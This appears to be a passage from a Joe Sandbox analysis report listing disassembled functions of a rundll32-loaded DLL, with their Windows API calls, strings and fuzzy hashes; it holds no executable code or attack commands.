Instruction ID: 1c38ab3b2c14ee1c247bdf225933c46791fcea5bd7c47801f16d03e79e27f587
Opcode Fuzzy Hash: 51a00e0988f626f2dae953a8ada664ba94390563386f7a615b68e84484e52bf4
Instruction Fuzzy Hash: 29518A34904688EEDB14DFA0CC85BDDB7B1EF45300F6081ADE5056B285CBB46E85CF91

Uniqueness

Uniqueness Score: -1.00%

Function 10021F51, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 10021E9F: GetParent.USER32(00000000), ref: 10021EF3
Part of subcall function 10021E9F: GetLastActivePopup.USER32(00000000), ref: 10021F04
Part of subcall function 10021E9F: IsWindowEnabled.USER32(00000000), ref: 10021F18
Part of subcall function 10021E9F: EnableWindow.USER32(00000000,00000000), ref: 10021F2B

EnableWindow.USER32(?,00000001), ref: 10021F9E
GetWindowThreadProcessId.USER32(?,?), ref: 10021FB2
GetCurrentProcessId.KERNEL32 ref: 10021FBC
SendMessageA.USER32 ref: 10021FD4
GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 1002204E
EnableWindow.USER32(00000000,00000001), ref: 10022093

Strings

0, xrefs: 10022029

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
String ID: 0
API String ID: 1877664794-4108050209
Opcode ID: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
Instruction ID: c7e4dcc29fd9e1fd486e00497d35318e62f13d9d594050e36cf698265b5585c7
Opcode Fuzzy Hash: fa47c2bca283c1efa9c57a90baf6965e2cf2faf5ec170df8e895b8240d28c0a6
Instruction Fuzzy Hash: 7B41EF75A00228ABEB21CF64DC86BDA77B8FF14750F900599FA58D7281D7B09E80CF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002102D, Relevance: 12.1, APIs: 8, Instructions: 66memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002104C
lstrcmpA.KERNEL32(?,?), ref: 10021058
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 1002106A
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 1002108A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 10021092
GlobalLock.KERNEL32 ref: 1002109C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 100210A9
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 100210C1

Part of subcall function 1002A801: GlobalFlags.KERNEL32(?), ref: 1002A810
Part of subcall function 1002A801: GlobalUnlock.KERNEL32(?,?,?,?,10021A27,?,00000214,1000148F), ref: 1002A822
Part of subcall function 1002A801: GlobalFree.KERNEL32 ref: 1002A82D

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction ID: 1e26f6493bbdf61cc617228eadb58d3a13350607a0778397bdab265459f41c03
Opcode Fuzzy Hash: 85f582fc0fa2d760b393ed167a5d421003042f2adcf672044b7dbfb8b9eda5cc
Instruction Fuzzy Hash: 6E11E079600640BBDB228BA5CD89DAFBAFDFB867407500529F605D2020DA72ED81DB64

Uniqueness

Uniqueness Score: -1.00%

Function 1002B84C, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128stringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 1002B878
lstrlenA.KERNEL32(?), ref: 1002B8C3
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000020), ref: 1002B8DD
_wcslen.LIBCMT ref: 1002B901

Strings

System, xrefs: 1002B874

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: ByteCharGlobalLockMultiWide_wcslenlstrlen
String ID: System
API String ID: 4253822919-3470857405
Opcode ID: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction ID: 7b5a175680f670ca79b6c2ec9272e95e82f354ff2106dbd97111df154043a3f4
Opcode Fuzzy Hash: d5816cacfd0a332e5282f5be394baf9a0c0f2a364455dc9baade1f500cebd3c2
Instruction Fuzzy Hash: C8412671D00619DFDB14CFA4DC85AAEBBB9FF04310F64812AE516EB285E770AD85CB50

Uniqueness

Uniqueness Score: -1.00%

Function 100270BC, Relevance: 10.6, APIs: 7, Instructions: 117windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 100270EF
PeekMessageA.USER32 ref: 10027113
UpdateWindow.USER32(?), ref: 1002712E
SendMessageA.USER32 ref: 1002714F
SendMessageA.USER32 ref: 10027167
UpdateWindow.USER32(?), ref: 100271AA
PeekMessageA.USER32 ref: 100271DB

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Message$Window$PeekSendUpdate$LongParent
String ID:
API String ID: 2853195852-0
Opcode ID: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction ID: e439185c47b7e5e34c348b8e0b3dbe5bb3c4b57b45cec7e657144295835a6737
Opcode Fuzzy Hash: 5e6b9223f0a1804046a8fbfe378e80d9714a9eacbb44f0fef3914e7058a9bdf9
Instruction Fuzzy Hash: 9041C370E00246EBDB11CF69DC84E9FBBF8FF82B81F90815DE949A2150D7719A50DB10

Uniqueness

Uniqueness Score: -1.00%

Function 10027676, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10027705
SendMessageA.USER32 ref: 1002772E
GetWindowLongA.USER32 ref: 10027740
GetWindowLongA.USER32 ref: 10027751
SetWindowLongA.USER32(?,000000FC,?), ref: 1002776D

Strings

,, xrefs: 10027724

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: LongWindow$MessageSend_memset
String ID: ,
API String ID: 2997958587-3772416878
Opcode ID: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction ID: f848ae84a4977e1a31b52bc52376e27e10e8709ed1b3efe9ee7841c93cdd6a05
Opcode Fuzzy Hash: 1276ef7f4d5813a713450155f5ae2d4635a7a3024c65db1a6c5f2f6a990dd864
Instruction Fuzzy Hash: 1431C134600B119FC715DF78E888A6AB7F5FF48350B92056DE58997691DB70E800CF94

Uniqueness

Uniqueness Score: -1.00%

Function 1002B26C, Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetCapture.USER32 ref: 1002B279
SendMessageA.USER32 ref: 1002B294
GetFocus.USER32 ref: 1002B2A9
SendMessageA.USER32 ref: 1002B2B7
GetLastActivePopup.USER32(?), ref: 1002B2E0
SendMessageA.USER32 ref: 1002B2ED

Part of subcall function 1002881E: GetWindowLongA.USER32 ref: 10028844
Part of subcall function 1002881E: GetParent.USER32(?), ref: 10028852

SendMessageA.USER32 ref: 1002B313

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: MessageSend$ActiveCaptureFocusLastLongParentPopupWindow
String ID:
API String ID: 3338174999-0
Opcode ID: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction ID: 3a08670cfc868389e080b955865bcb0f045f405a5b874c30a2897e43bb08e3ed
Opcode Fuzzy Hash: 8b045ddbd33b9174f1829eda3b456e63d99d5e6e5f6e5226114c782d6a6a23be
Instruction Fuzzy Hash: 7F1146B590065AFFEB11DFA1DD8AC9E7E7CEF41788B910075F504A2121EB719F04AB20

Uniqueness

Uniqueness Score: -1.00%

Function 1002AAF8, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?), ref: 1002AB28
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB4B
RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?), ref: 1002AB67
RegCloseKey.ADVAPI32(?), ref: 1002AB77
RegCloseKey.ADVAPI32(?), ref: 1002AB81

Strings

software, xrefs: 1002AB10

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: CloseCreate$Open
String ID: software
API String ID: 1740278721-2010147023
Opcode ID: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction ID: fb36ca9c2f952ecb3db15ddf6cda8d32fba402c4719dfc4725c3bd37d29a496b
Opcode Fuzzy Hash: ccb9b6360ff57769a68f726ed1728c19480870e0bb9bbd8d9feb64ffad4441d4
Instruction Fuzzy Hash: 6B11E672900158FBDB11DB9ADD88CDFBFBDEB8A750B5000AAF504A2122D7319E44DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 10043F42, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 10043F49

Part of subcall function 1001E9D0: _strlen.LIBCMT ref: 1001E9EF

std::bad_exception::bad_exception.LIBCMT ref: 10043F66

Part of subcall function 10043EBB: std::runtime_error::runtime_error.LIBCPMT ref: 10043EC6

__CxxThrowException@8.LIBCMT ref: 10043F74

Part of subcall function 100312CD: RaiseException.KERNEL32(?,?,1004B6B4,1004F1B8,?,?,?,100203CA,1004B6B4,1004F1B8,00000000,00000000), ref: 1003130F

__EH_prolog3.LIBCMT ref: 10043F81
std::exception::exception.LIBCMT ref: 10043F8F

Part of subcall function 1002E469: _strlen.LIBCMT ref: 1002E48E
Part of subcall function 1002E469: _malloc.LIBCMT ref: 1002E497
Part of subcall function 1002E469: _strcpy_s.LIBCMT ref: 1002E4AA

Strings

invalid string position, xrefs: 10043F4E

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: H_prolog3_strlen$ExceptionException@8RaiseThrow_malloc_strcpy_sstd::bad_exception::bad_exceptionstd::exception::exceptionstd::runtime_error::runtime_error
String ID: invalid string position
API String ID: 4120362211-1799206989
Opcode ID: 97906f4528da14ea0c25c07e3bf4fa5a144fbad0ec193e82ccdbbf26246ef938
Instruction ID: 6cafb6d6e9d0ad3c5232114cd1790b1479a3a042366c2eba6062129a72844890
Opcode Fuzzy Hash: 97906f4528da14ea0c25c07e3bf4fa5a144fbad0ec193e82ccdbbf26246ef938
Instruction Fuzzy Hash: 4FF06DBA8001889BCB01DF90DC01BDEB378EF54311F600829F601EB142DBB4BA45CB99

Uniqueness

Uniqueness Score: -1.00%

Function 1002A948, Relevance: 10.5, APIs: 7, Instructions: 30COMMON

Download Yara Rule

APIs

GetSysColor.USER32(0000000F), ref: 1002A956
GetSysColor.USER32(00000010), ref: 1002A95D
GetSysColor.USER32(00000014), ref: 1002A964
GetSysColor.USER32(00000012), ref: 1002A96B
GetSysColor.USER32(00000006), ref: 1002A972
GetSysColorBrush.USER32(0000000F), ref: 1002A97F
GetSysColorBrush.USER32(00000006), ref: 1002A986

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Color$Brush
String ID:
API String ID: 2798902688-0
Opcode ID: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction ID: 2de359d209fd3f7b37bcce9053ec3ec9da3e309d31870537ed148616a4e248d0
Opcode Fuzzy Hash: 2aeb855fe3a01d91a1c159618acf838dda1bc2281205f0400994082937ea778a
Instruction Fuzzy Hash: 0BF0FE719407445BD730BF724E49B47BAD1FFC4710F02092EE2458B990D6B6E441DF44

Uniqueness

Uniqueness Score: -1.00%

Function 10023266, Relevance: 9.1, APIs: 6, Instructions: 136COMMON

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 1002326D
GlobalLock.KERNEL32 ref: 10023345
CreateDialogIndirectParamA.USER32(?,?,?,10022CA4,00000000), ref: 10023374
DestroyWindow.USER32(00000000,?,1000150C,00000000,EDE0AFBE), ref: 100233EE
GlobalUnlock.KERNEL32(?,?,1000150C,00000000,EDE0AFBE), ref: 100233FE
GlobalFree.KERNEL32 ref: 10023407

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Global$CreateDestroyDialogFreeH_prolog3_catchIndirectLockParamUnlockWindow
String ID:
API String ID: 3003189058-0
Opcode ID: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction ID: 542586d5134ef99c8f61472b69a72313b72e87743f096b2e8f632b75dff3f323
Opcode Fuzzy Hash: 888fa3cfcf776247989f330621f25040a0e9d6be9df16a9d0be9406a16dfc2c2
Instruction Fuzzy Hash: DD519B31A0024AEFCB04DFA4E9859AEBBB5EF04350F95442DF506E7292CB70AA45CB61

Uniqueness

Uniqueness Score: -1.00%

Function 10021E9F, Relevance: 9.1, APIs: 6, Instructions: 69COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32 ref: 10021ED2
GetParent.USER32(00000000), ref: 10021EE0
GetParent.USER32(00000000), ref: 10021EF3
GetLastActivePopup.USER32(00000000), ref: 10021F04
IsWindowEnabled.USER32(00000000), ref: 10021F18
EnableWindow.USER32(00000000,00000000), ref: 10021F2B

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
String ID:
API String ID: 670545878-0
Opcode ID: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
Instruction ID: f929a2de190b898985c8684475384bdcb1a7d6cc0d17529594567964d95cf4f5
Opcode Fuzzy Hash: 472b318fd5bad27ffdf09f8c34eab2449045ee6e889f529d1c6834af2a2317c9
Instruction Fuzzy Hash: 7711E73B5012725BDBA2DA65AD80BDF32D8EFB5AE1F830165EC24E7204D730CD0142D5

Uniqueness

Uniqueness Score: -1.00%

Function 10037738, Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 10037760

Part of subcall function 10030430: __getptd.LIBCMT ref: 1003043E
Part of subcall function 10030430: __getptd.LIBCMT ref: 1003044C

__getptd.LIBCMT ref: 1003776A

Part of subcall function 10034770: __getptd_noexit.LIBCMT ref: 10034773
Part of subcall function 10034770: __amsg_exit.LIBCMT ref: 10034780

__getptd.LIBCMT ref: 10037778
__getptd.LIBCMT ref: 10037786
__getptd.LIBCMT ref: 10037791
_CallCatchBlock2.LIBCMT ref: 100377B7

Part of subcall function 100304D5: __CallSettingFrame@12.LIBCMT ref: 10030521

Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003786D
Part of subcall function 1003785E: __getptd.LIBCMT ref: 1003787B

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction ID: fb1f34f9027f5a0fd6fb665b034cbc12c1ee6665b85233a2d450c333db5c1a8f
Opcode Fuzzy Hash: 46636e942f87dcca0c30cf7feca0092d3b0ea187b49415045ba274b669f62aa0
Instruction Fuzzy Hash: 4F1104B9C04249EFDB01DFA4D945AEE7BB1FF08315F508469F814AB251DB38AA11DF90

Uniqueness

Uniqueness Score: -1.00%

Function 1002A8D2, Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 1002A8E3
GetDlgCtrlID.USER32(00000000), ref: 1002A8F7
GetWindowLongA.USER32 ref: 1002A907
GetWindowRect.USER32 ref: 1002A919
PtInRect.USER32(?,?,?), ref: 1002A929
GetWindow.USER32(?,00000005), ref: 1002A936

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: Window$Rect$ClientCtrlLongScreen
String ID:
API String ID: 1315500227-0
Opcode ID: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction ID: abcb09268cf445b2c35b0e2b56c0cfd5e9caec1888beec0722017402bcd9ce52
Opcode Fuzzy Hash: f0130467347104804c256745cbc3b6b13c5e57ae72556175195e5c4804d3d92f
Instruction Fuzzy Hash: FC018F32500126BBEB219F559D48EAF3BACFF463A1F414165FD15D6060DB30DA829A98

Uniqueness

Uniqueness Score: -1.00%

Function 10029F40, Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 244COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10029F70

Strings

@, xrefs: 1002A07C
@, xrefs: 1002A115
AfxMDIFrame90s, xrefs: 1002A011
AfxFrameOrView90s, xrefs: 1002A036

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _memset
String ID: @$@$AfxFrameOrView90s$AfxMDIFrame90s
API String ID: 2102423945-455206835
Opcode ID: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
Instruction ID: fa70bd333b2ddaae6f39455d5bc8e436e1dc58d3be4ecb045c2565641b92f197
Opcode Fuzzy Hash: 7bcac898d79bec3422349b7028506952ff69134773f17cb7bb074026e0cf6295
Instruction Fuzzy Hash: BD914175C00219ABDB80CFA4D581BDEBBF9EF48384F518065F908E7181EB749B84DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 10001D60, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 136windowCOMMON

Download Yara Rule

APIs

Part of subcall function 10022D72: _memset.LIBCMT ref: 10022D8E

_strlen.LIBCMT ref: 10001E7F
_strlen.LIBCMT ref: 10001EF1
_strlen.LIBCMT ref: 10001F36
LoadIconA.USER32 ref: 10001F81

Strings

127.0.0.1, xrefs: 10001E68, 10001E7A, 10001E8E

Memory Dump Source

Source File: 00000004.00000002.377189040.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000004.00000002.377182355.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377366543.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.377401095.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377425552.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000004.00000002.377743053.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377757654.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.377824439.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd

Similarity

API ID: _strlen$IconLoad_memset
String ID: 127.0.0.1
API String ID: 858515944-3619153832
Opcode ID: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
Instruction ID: cb70d14c711791ee52ee588ee2f9325bb7e7fa3515ba92e26f588566a221a80e
Opcode Fuzzy Hash: b8f0a33aed5857d50bc6d4f51472f84c63fc56d9dccdc7a641a98e34b1a5589f
Instruction Fuzzy Hash: AE5118B4904298DBDB14CFA4CC41B9EBBB1EF45308F6481A8E50DAB392DB356E85CF54

Uniqueness

Uniqueness Score: -1.00%

Function 10020982, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 94windowCOMMON

Download Yara Rule

APIs

GetMenuCheckMarkDimensions.USER32 ref: 1002099A
_memset.LIBCMT ref: 10020A12
